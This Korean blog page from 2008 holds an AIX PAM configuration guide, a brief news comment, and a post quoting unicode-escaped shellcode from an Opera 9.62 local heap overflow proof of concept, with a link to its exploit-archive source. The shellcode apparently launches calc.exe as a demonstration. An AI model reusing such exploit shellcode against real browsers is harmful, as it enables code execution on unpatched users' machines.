2008년 11월 18일

AIX /etc/pam.conf

On AIX 5.2

Make PAM Framework configuration

touch /etc/pam.conf 
chmod 644 /etc/pam.conf 
chown root:security /etc/pam.conf

Setup pam.conf

#
# Authentication
#
ftp     auth    required        /usr/lib/security/pam_aix
imap    auth    required        /usr/lib/security/pam_aix
login   auth    required        /usr/lib/security/pam_aix
rexec   auth    required        /usr/lib/security/pam_aix
rlogin  auth    required        /usr/lib/security/pam_aix
snapp   auth    required        /usr/lib/security/pam_aix
su      auth    required        /usr/lib/security/pam_aix
telnet  auth    required        /usr/lib/security/pam_aix
OTHER   auth    required        /usr/lib/security/pam_aix

#
# Account Management
#
ftp     account required        /usr/lib/security/pam_aix
login   account required        /usr/lib/security/pam_aix
rexec   account required        /usr/lib/security/pam_aix
rlogin  account required        /usr/lib/security/pam_aix
rsh     account required        /usr/lib/security/pam_aix
su      account required        /usr/lib/security/pam_aix
telnet  account required        /usr/lib/security/pam_aix
OTHER   account required        /usr/lib/security/pam_aix

#
# Password Management
#
login   password  required      /usr/lib/security/pam_aix
passwd  password  required      libpamtivoli.so use_first_pass 
     /opt/ibm/DiPlugins/PAM/pampwsync.props
rlogin  password  required      /usr/lib/security/pam_aix
su      password  required      /usr/lib/security/pam_aix
telnet  password  required      /usr/lib/security/pam_aix
OTHER   password  required      /usr/lib/security/pam_aix

#
# Session Management
#
ftp     session required        /usr/lib/security/pam_aix
imap    session required        /usr/lib/security/pam_aix
login   session required        /usr/lib/security/pam_aix
rexec   session required        /usr/lib/security/pam_aix
rlogin  session required        /usr/lib/security/pam_aix
rsh     session required        /usr/lib/security/pam_aix
snapp   session required        /usr/lib/security/pam_aix
su      session required        /usr/lib/security/pam_aix
telnet  session required        /usr/lib/security/pam_aix
OTHER   session required        /usr/lib/security/pam_aix



Enable PAM

edit /usr/lib/security/method.cfg

PAM
program = /usr/lib/security/PAM 	
program_64 = /usr/lib/security/PAM

options = auth=PAM,db=BUILTIN

*winbind
program = /usr/lib/security/WINBIND
options = authonly

On AIX 5.3(native support PAM)

http://publib.boulder.ibm.com/infocenter/tivihelp/v2r1/index.jsp?topic=/com.ibm.IBMDI.doc_6.1/pluginsguide65.htm



by 서린 | 2008/11/18 19:07 | AIX | 트랙백 | 덧글(0)

2008년 11월 18일

미국도 IT 수장은 문과냐.

오마바호 IT수장 관련 뉴스

>그는 오바마 대통령 당선인의 선거 유세 기간 동안 기술 정책에 대한 폭넓은 자문을 수행한데다 오바마 당선인의 하버드 법대 동기이기도 하다. 또 클린턴 정부 시절 FCC에서 근무했던 이력도 빼놓을 수 없다.

법대에 벤쳐 캐피털 리스트.

by 서린 | 2008/11/18 10:58 | 문득 | 트랙백 | 덧글(0)

2008년 11월 18일

Opera 9.62 file:// Local Heap Overflow PoC

http://www.milw0rm.com/exploits/7135

>var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
순수하게 존경심이....

ps:패치가 없다. 어쩌지.

by 서린 | 2008/11/18 10:42 | 문득 | 트랙백 | 덧글(0)

◀ 이전 페이지          다음 페이지 ▶